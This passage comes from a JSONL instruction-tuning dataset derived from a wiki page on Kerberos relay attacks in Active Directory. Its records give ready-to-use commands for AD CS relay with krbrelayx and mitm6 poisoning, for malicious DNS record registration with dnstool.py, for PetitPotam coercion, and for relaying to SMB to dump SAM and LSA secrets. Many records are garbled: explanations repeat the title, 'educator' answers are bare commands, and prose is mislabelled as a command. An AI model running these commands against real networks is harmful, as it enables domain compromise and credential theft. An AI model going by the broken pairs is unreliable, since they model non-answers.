AP-REQ message for an arbitrary service, which can then be relayed. The following section is a summary of his blog post, and of James Forshaw's original article.\n\n> The DNS 'start of authority' (SOA) record stores important information about a domain or zone such as the email address of the administrator, when the domain was last updated, and how long the server should wait between refreshes.\n>\n> All DNS zones need an SOA record in order to conform to IETF standards. SOA records are also important for zone transfers.\n> \n> _(Cloudflare, source)_\n\nAn interesting service for relaying authentications is the AD CS HTTP service, which by default is vulnerable to relay attacks as it does not enforce signing with HTTP, allowing an ESC8 to be exploited via Kerberos from a mitm6 DNS poisoning.\n\nDNS is used in Kerberos authentication operations in Active Directory. In particular, it is used through Secure dynamic updates, which are used to keep DNS records synchronised with the IP addresses of dynamically addressed clients.\n\nTo summarise, the steps involved in such an exchange are as follows:\n\n> 1. The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.\n> 2. The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp.\n> 3. The client attempts a dynamic update on the A record with their name in the zone internal.corp.\n> 4. This dynamic update is refused by the server because no authentication is provided.\n> 5. The client uses a TKEY query to negotiate a secret key for authenticated queries.\n> 6. The server answers with a TKEY Resource Record, which completes the authentication.\n> 7. The client sends the dynamic update again, ", "metadata": {"corpus_index": 696, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of In a first terminal, waiting for an authentication to relay"}, {"role": "assistant", "content": "krbrelayx.py --target http://$ADCS_FQDN/certsrv/ -ip $ATTACKER_IP --victim $TARGET_SAMNAME --adcs --template Machine"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of In a first terminal, waiting for an authentication to relay", "response": "krbrelayx.py --target http://$ADCS_FQDN/certsrv/ -ip $ATTACKER_IP --victim $TARGET_SAMNAME --adcs --template Machine", "metadata": {"corpus_index": 697, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform In a first terminal, waiting for an authentication to relay?"}, {"role": "assistant", "content": "krbrelayx.py --target http://$ADCS_FQDN/certsrv/ -ip $ATTACKER_IP --victim $TARGET_SAMNAME --adcs --template Machine"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform In a first terminal, waiting for an authentication to relay?", "response": "krbrelayx.py --target http://$ADCS_FQDN/certsrv/ -ip $ATTACKER_IP --victim $TARGET_SAMNAME --adcs --template Machine", "metadata": {"corpus_index": 697, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about In a second terminal, poisoning the victim?"}, {"role": "assistant", "content": "mitm6 -i $ATTACKER_IP -d $DOMAIN -hw $TARGET_FQDN --relay $ADCS_FQDN -v\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about In a second terminal, poisoning the victim?", "response": "mitm6 -i $ATTACKER_IP -d $DOMAIN -hw $TARGET_FQDN --relay $ADCS_FQDN -v\n```", "metadata": {"corpus_index": 698, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do In a second terminal, poisoning the victim"}, {"role": "assistant", "content": "mitm6 -i $ATTACKER_IP -d $DOMAIN -hw $TARGET_FQDN --relay $ADCS_FQDN -v\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do In a second terminal, poisoning the victim", "response": "mitm6 -i $ATTACKER_IP -d $DOMAIN -hw $TARGET_FQDN --relay $ADCS_FQDN -v\n```", "metadata": {"corpus_index": 698, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberos relay - Abuse from a coerced authentication?"}, {"role": "assistant", "content": "As demonstrated by Synacktiv in this blog post, it is also possible to relay a Kerberos authentication from, and to, unsigned SMB services, when it comes from a coercion.\n\nWhen an SMB client builds the SPN from the service class and its name, the SecMakeSPNEx2 method is called, which calls the CredMarshalTargetInfo API function. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure, marshalizes it in Base64, and appends it to the end of the actual SPN.\n\nFor the hostname target and the class of service cifs, the returned SPN will look like :\n\n``\ncifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA\n`\n\nSo, if an attacker registers the DNS record target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA, the client will be able to request a ticket for cifs/target, but will connect to target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA. By default, any authenticated user is allowed to create new DNS records in the ADIDNS.\n\nIn his original article, James Forshaw notes this point:\n\n> Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered, then it's going to be more difficult to exploit.\n>\n> _(James Forshaw, October 20, 2021, source)_\n\nIt is therefore necessary to restrict the content of the CREDENTIAL_TARGET_INFORMATION structure as much as possible. The minimal CREDENTIAL_TARGET_INFORMATION structure contains 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.\n\n1. First of all, register the specific DNS record (the NetBIOS being that of the machine which is going to receive the relay, for example the PKI, and not the one which will be coerced). This can be performed with dnstool.py (Python):\n\n`bash\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberos relay - Abuse from a coerced authentication?", "response": "As demonstrated by Synacktiv in this blog post, it is also possible to relay a Kerberos authentication from, and to, unsigned SMB services, when it comes from a coercion.\n\nWhen an SMB client builds the SPN from the service class and its name, the SecMakeSPNEx2 method is called, which calls the CredMarshalTargetInfo API function. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure, marshalizes it in Base64, and appends it to the end of the actual SPN.\n\nFor the hostname target and the class of service cifs, the returned SPN will look like :\n\n``\ncifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA\n`\n\nSo, if an attacker registers the DNS record target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA, the client will be able to request a ticket for cifs/target, but will connect to target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA. By default, any authenticated user is allowed to create new DNS records in the ADIDNS.\n\nIn his original article, James Forshaw notes this point:\n\n> Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered, then it's going to be more difficult to exploit.\n>\n> _(James Forshaw, October 20, 2021, source)_\n\nIt is therefore necessary to restrict the content of the CREDENTIAL_TARGET_INFORMATION structure as much as possible. The minimal CREDENTIAL_TARGET_INFORMATION structure contains 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.\n\n1. First of all, register the specific DNS record (the NetBIOS being that of the machine which is going to receive the relay, for example the PKI, and not the one which will be coerced). This can be performed with dnstool.py (Python):\n\n`bash\n", "metadata": {"corpus_index": 699, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Kerberos relay - Abuse from a coerced authentication?"}, {"role": "assistant", "content": "As demonstrated by Synacktiv in this blog post, it is also possible to relay a Kerberos authentication from, and to, unsigned SMB services, when it comes from a coercion.\n\nWhen an SMB client builds the SPN from the service class and its name, the SecMakeSPNEx2 method is called, which calls the CredMarshalTargetInfo API function. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure, marshalizes it in Base64, and appends it to the end of the actual SPN.\n\nFor the hostname target and the class of service cifs, the returned SPN will look like :\n\n``\ncifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA\n`\n\nSo, if an attacker registers the DNS record target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA, the client will be able to request a ticket for cifs/target, but will connect to target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA. By default, any authenticated user is allowed to create new DNS records in the ADIDNS.\n\nIn his original article, James Forshaw notes this point:\n\n> Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered, then it's going to be more difficult to exploit.\n>\n> _(James Forshaw, October 20, 2021, source)_\n\nIt is therefore necessary to restrict the content of the CREDENTIAL_TARGET_INFORMATION structure as much as possible. The minimal CREDENTIAL_TARGET_INFORMATION structure contains 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.\n\n1. First of all, register the specific DNS record (the NetBIOS being that of the machine which is going to receive the relay, for example the PKI, and not the one which will be coerced). This can be performed with dnstool.py (Python):\n\n`bash\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Kerberos relay - Abuse from a coerced authentication?", "response": "As demonstrated by Synacktiv in this blog post, it is also possible to relay a Kerberos authentication from, and to, unsigned SMB services, when it comes from a coercion.\n\nWhen an SMB client builds the SPN from the service class and its name, the SecMakeSPNEx2 method is called, which calls the CredMarshalTargetInfo API function. This API takes a list of target information in a CREDENTIAL_TARGET_INFORMATION structure, marshalizes it in Base64, and appends it to the end of the actual SPN.\n\nFor the hostname target and the class of service cifs, the returned SPN will look like :\n\n``\ncifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA\n`\n\nSo, if an attacker registers the DNS record target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA, the client will be able to request a ticket for cifs/target, but will connect to target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA. By default, any authenticated user is allowed to create new DNS records in the ADIDNS.\n\nIn his original article, James Forshaw notes this point:\n\n> Another issue is that the size limit of a single name in DNS is 63 characters. The minimum valid marshaled buffer is 44 characters long leaving only 19 characters for the SPN part. This is at least larger than the minimum NetBIOS name limit of 15 characters so as long as there's an SPN for that shorter name registered it should be sufficient. However if there's no short SPN name registered, then it's going to be more difficult to exploit.\n>\n> _(James Forshaw, October 20, 2021, source)_\n\nIt is therefore necessary to restrict the content of the CREDENTIAL_TARGET_INFORMATION structure as much as possible. The minimal CREDENTIAL_TARGET_INFORMATION structure contains 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.\n\n1. First of all, register the specific DNS record (the NetBIOS being that of the machine which is going to receive the relay, for example the PKI, and not the one which will be coerced). This can be performed with dnstool.py (Python):\n\n`bash\n", "metadata": {"corpus_index": 699, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Kerberos relay - Abuse from a coerced authentication"}, {"role": "assistant", "content": "cifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Kerberos relay - Abuse from a coerced authentication", "response": "cifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA", "metadata": {"corpus_index": 700, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `cifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA`?"}, {"role": "assistant", "content": "This command is used for kerberos relay - abuse from a coerced authentication. Abuse from a coerced authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `cifs/target1UWhRCAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAtargetsBAAAA`?", "response": "This command is used for kerberos relay - abuse from a coerced authentication. Abuse from a coerced authentication", "metadata": {"corpus_index": 700, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the dnstool.py syntax for kerberos relay - abuse from a coerced authentication?"}, {"role": "assistant", "content": "dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the dnstool.py syntax for kerberos relay - abuse from a coerced authentication?", "response": "dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp", "metadata": {"corpus_index": 701, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dnstool.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Kerberos relay - Abuse from a coerced authentication"}, {"role": "assistant", "content": "dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Kerberos relay - Abuse from a coerced authentication", "response": "dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp", "metadata": {"corpus_index": 701, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp`?"}, {"role": "assistant", "content": "This command is used for kerberos relay - abuse from a coerced authentication. Abuse from a coerced authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dnstool.py -u \"$DOMAIN\\\\$USERNAME\" -p \"$PASSWORD\" -r \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" -d \"$ATTACKER_IP\" --action add \"$DC_IP\" --tcp`?", "response": "This command is used for kerberos relay - abuse from a coerced authentication. Abuse from a coerced authentication", "metadata": {"corpus_index": 701, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does In a first terminal, krbrelayx waiting for an authentication to relay work?"}, {"role": "assistant", "content": "krbrelayx.py -t 'http://$ADCS_FQDN/certsrv/certfnsh.asp' --adcs --template DomainController -v '$RELAYED_TARGET_SAMNAME'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does In a first terminal, krbrelayx waiting for an authentication to relay work?", "response": "krbrelayx.py -t 'http://$ADCS_FQDN/certsrv/certfnsh.asp' --adcs --template DomainController -v '$RELAYED_TARGET_SAMNAME'", "metadata": {"corpus_index": 702, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform In a first terminal, krbrelayx waiting for an authentication to relay?"}, {"role": "assistant", "content": "krbrelayx.py -t 'http://$ADCS_FQDN/certsrv/certfnsh.asp' --adcs --template DomainController -v '$RELAYED_TARGET_SAMNAME'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform In a first terminal, krbrelayx waiting for an authentication to relay?", "response": "krbrelayx.py -t 'http://$ADCS_FQDN/certsrv/certfnsh.asp' --adcs --template DomainController -v '$RELAYED_TARGET_SAMNAME'", "metadata": {"corpus_index": 702, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain In a second terminal, coerce the victim authentication to the DNS record"}, {"role": "assistant", "content": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" $TARGET_IP\n``\n\nIn the case where the target of the relay (the machine receiving the relay) is an unsigned SMB service, and the authentication obtained is privileged, the following command will dump the SAM and the LSA secrets:\n\n`bash\nkrbrelayx.py -t smb://$TARGET_FQDN\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain In a second terminal, coerce the victim authentication to the DNS record", "response": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" $TARGET_IP\n``\n\nIn the case where the target of the relay (the machine receiving the relay) is an unsigned SMB service, and the authentication obtained is privileged, the following command will dump the SAM and the LSA secrets:\n\n`bash\nkrbrelayx.py -t smb://$TARGET_FQDN\n``", "metadata": {"corpus_index": 703, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for In a second terminal, coerce the victim authentication to the DNS record?"}, {"role": "assistant", "content": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" $TARGET_IP\n``\n\nIn the case where the target of the relay (the machine receiving the relay) is an unsigned SMB service, and the authentication obtained is privileged, the following command will dump the SAM and the LSA secrets:\n\n`bash\nkrbrelayx.py -t smb://$TARGET_FQDN\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for In a second terminal, coerce the victim authentication to the DNS record?", "response": "Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD \"[ADCS_NETBIOS]1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\" $TARGET_IP\n``\n\nIn the case where the target of the relay (the machine receiving the relay) is an unsigned SMB service, and the authentication obtained is privileged, the following command will dump the SAM and the LSA secrets:\n\n`bash\nkrbrelayx.py -t smb://$TARGET_FQDN\n``", "metadata": {"corpus_index": 703, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the In command to in a second terminal, coerce the victim authentication to the dns record"}, {"role": "assistant", "content": "In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the In command to in a second terminal, coerce the victim authentication to the dns record", "response": "In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):", "metadata": {"corpus_index": 704, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "In"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through In a second terminal, coerce the victim authentication to the DNS record"}, {"role": "assistant", "content": "In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through In a second terminal, coerce the victim authentication to the DNS record", "response": "In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):", "metadata": {"corpus_index": 704, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):`?"}, {"role": "assistant", "content": "This command is used for in a second terminal, coerce the victim authentication to the dns record. In a second terminal, coerce the victim authentication to the DNS record"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `In the case where the target of the relay (**the machine receiving the relay**) is an unsigned SMB service, and the authentication obtained is privileged, the following command will [dump the SAM and the LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md):`?", "response": "This command is used for in a second terminal, coerce the victim authentication to the dns record. In a second terminal, coerce the victim authentication to the DNS record", "metadata": {"corpus_index": 704, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Kerberos relay - Abuse from multicast poisoning"}, {"role": "assistant", "content": "When a web server requests Kerberos authentication, it does not use the destination URL to determine the SPN for which an ST is to be retrieved, but rather the response name of the DNS response. Nominally, these two elements should coincide. The client accesses a login URL, performs the DNS query for the server's FQDN, then performs the ST request from the DNS response, and constructs the AP-REQ.\n\nHowever, an attacker in a Man-in-the-Middle position can poison the DNS response and indicate that the HTTP server's FQDN points to him. In this way, the victim will obtain an ST for the server, construct the AP-REQ, and send it to the attacker. This is the attack Synacktiv has demonstrated in this article.\n\n> [!NOTE]\n> Note that the technique will not work for SMB clients, because it is not possible to opportunistically respond via LLMNR to non-existent hostnames in SMB with a response name containing a CREDENTIAL_TARGET_INFORMATION structure. This structure is explained in the previous section.\n>\n> > Another limitation is that, according to our tests, other local name resolution protocols such as mDNS and NBTNS cannot be abused to carry out the attack. Indeed, while LLMNR responses contain both the query sent by the client and the response, this is not the case of mDNS and NBTNS, which only contain responses.[...]\n> >\n> > Because mDNS and NBTNS only contain name resolution responses, changing the answer name will actually confuse the HTTP clients, which will not be able to make the connection between the query they sent, and the modified response.\n> >\n> > _(Quentin Roland, January 27, 2025, source)_\n>\n> Finally, most HTTP clients use the Kerberos Negociate package, which forces the signature to be set up. This means that even HTTP authentication cannot be relayed to LDAP.\n\nHere are the different steps to perform the attack:\n\n1. Set up an LLMNR poisoner, for example with Responder (Python).\n2. An HTTP client fails to resolve a hostname, for any reason.\n3. The LLMNR poison"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Kerberos relay - Abuse from multicast poisoning", "response": "When a web server requests Kerberos authentication, it does not use the destination URL to determine the SPN for which an ST is to be retrieved, but rather the response name of the DNS response. Nominally, these two elements should coincide. The client accesses a login URL, performs the DNS query for the server's FQDN, then performs the ST request from the DNS response, and constructs the AP-REQ.\n\nHowever, an attacker in a Man-in-the-Middle position can poison the DNS response and indicate that the HTTP server's FQDN points to him. In this way, the victim will obtain an ST for the server, construct the AP-REQ, and send it to the attacker. This is the attack 